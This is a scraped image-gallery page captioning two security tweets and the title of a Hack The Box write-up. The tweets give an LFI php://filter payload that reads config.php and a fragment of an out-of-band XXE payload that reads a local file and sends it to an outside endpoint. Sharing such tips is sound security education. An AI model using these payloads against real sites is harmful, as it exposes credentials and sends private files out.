![Adrian on Twitter: "Making use of an LFI vulnerability you can read the contents of any PHP file with this filter: http://example[.]com/index.php ?page=php://filter/read=convert.base64-encode/resource=config.php #LFI #LocalFileInclusion #Tip #Disclosure ... Adrian on Twitter: "Making use of an LFI vulnerability you can read the contents of any PHP file with this filter: http://example[.]com/index.php ?page=php://filter/read=convert.base64-encode/resource=config.php #LFI #LocalFileInclusion #Tip #Disclosure ...](https://pbs.twimg.com/media/DguVKylW4AAnuZZ.jpg)
Adrian on Twitter: "Making use of an LFI vulnerability you can read the contents of any PHP file with this filter: http://example[.]com/index.php ?page=php://filter/read=convert.base64-encode/resource=config.php #LFI #LocalFileInclusion #Tip #Disclosure ...
![Jinwook Kim on Twitter: "Exploiting Out Of Band XXE using internal network and php wrappers <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/ resource=file:///D:/path/index.php"> ... exfil SYSTEM "http://target/endp. php?sid=[session_id]& ... Jinwook Kim on Twitter: "Exploiting Out Of Band XXE using internal network and php wrappers <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/ resource=file:///D:/path/index.php"> ... exfil SYSTEM "http://target/endp. php?sid=[session_id]& ...](https://pbs.twimg.com/media/ECSoMxuUEAA1abz.png)
Jinwook Kim on Twitter: "Exploiting Out Of Band XXE using internal network and php wrappers <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/ resource=file:///D:/path/index.php"> ... exfil SYSTEM "http://target/endp. php?sid=[session_id]& ...
![Bounty Hunter HTB Solution. Hello, this is my first publication of… | by Diego joel Condori Quispe | Medium Bounty Hunter HTB Solution. Hello, this is my first publication of… | by Diego joel Condori Quispe | Medium](https://miro.medium.com/max/1400/1*-UR9EhgaX8z6OIxu2ZUzpw.png)